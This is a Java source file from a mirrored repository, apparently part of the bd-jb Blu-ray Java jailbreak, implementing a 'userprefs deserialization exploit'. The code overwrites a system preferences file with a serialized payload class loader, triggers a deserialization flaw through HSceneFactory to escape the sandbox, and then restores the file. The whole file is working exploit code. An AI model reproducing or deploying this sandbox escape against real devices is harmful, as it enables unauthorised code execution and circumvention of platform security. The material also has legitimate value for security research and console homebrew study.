mirror of https://github.com/TheOfficialFloW/bd-jb
62 lines
1.8 KiB
Java
62 lines
1.8 KiB
Java
/*
|
|
* Copyright (C) 2021 Andy Nguyen
|
|
*
|
|
* This software may be modified and distributed under the terms
|
|
* of the MIT license. See the LICENSE file for details.
|
|
*/
|
|
|
|
package com.bdjb.exploit.sandbox;
|
|
|
|
import java.io.FileOutputStream;
|
|
import java.io.InputStream;
|
|
import java.io.ObjectOutputStream;
|
|
import java.io.OutputStream;
|
|
import org.havi.ui.HSceneFactory;
|
|
|
|
/** Implementation of the userprefs deserialization exploit. */
|
|
public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
|
|
private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
|
|
|
|
private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
|
|
"/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
|
|
|
|
public boolean trigger() throws Exception {
|
|
try {
|
|
// Overwrite userprefs with a serialized PayloadClassLoader.
|
|
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
|
|
OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
|
|
|
|
byte[] buf = new byte[8192];
|
|
int read;
|
|
while ((read = inputStream.read(buf)) > 0) {
|
|
outputStream.write(buf, 0, read);
|
|
}
|
|
|
|
outputStream.close();
|
|
inputStream.close();
|
|
|
|
// Trigger deserialization vulnerability.
|
|
try {
|
|
HSceneFactory.getInstance().getDefaultHScene();
|
|
} catch (ClassCastException e) {
|
|
// Exception expected.
|
|
|
|
// Instantiate the payload class.
|
|
PayloadClassLoader.getInstance().newPayload();
|
|
|
|
return true;
|
|
}
|
|
} finally {
|
|
// Restore userprefs file.
|
|
String[][] preferences = new String[9][];
|
|
preferences[3] = new String[] {"26"};
|
|
ObjectOutputStream outputStream =
|
|
new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
|
|
outputStream.writeObject(preferences);
|
|
outputStream.close();
|
|
}
|
|
|
|
return false;
|
|
}
|
|
}
|